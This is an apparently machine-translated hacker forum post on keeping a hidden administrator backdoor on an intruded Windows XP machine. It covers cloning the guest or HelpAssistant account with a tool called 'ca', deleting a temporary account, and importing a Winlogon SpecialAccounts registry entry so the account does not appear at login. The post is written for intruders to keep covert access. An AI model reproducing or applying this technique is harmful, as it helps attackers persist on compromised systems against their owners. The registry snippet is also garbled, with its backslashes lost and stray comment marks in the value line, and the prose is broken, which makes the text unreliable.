Some brothers do not dare to add an account after they intrude into xp, because the added account can be seen on the login interface, so the common brothers Add the helpassistant account as the administrator, then change the Registry to change the xp Remote connection to the classic mode, and then use helpassistant to log on. However, this method is too invisible and can be easily discovered by the host !!
So today I want to introduce a new method. Let's take it as an example. If you have any good method, let's just take it !!
First, change the registry, change xp to the classic mode, then create an administrator account test, remotely clone the guest with ca, and then delete the test account,
Finally, import the following code to the registry:
CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsuserlist]
// "Guest //" = dword: 00000000 // guest is the account you want to hide
In this way, guest is still in the guest group, but he has the administrator privilege and cannot see it on the login interface !!
You can also use this method to hide other accounts in the system !!
In fact, you can also use ca to clone the helpassistant account, which is hidden by default!
You can also change the password of administratror and use this account as your backdoor user, because this user is not displayed in xp, administrators generally only need this account in Security Mode !!!
What are the errors in a rush !!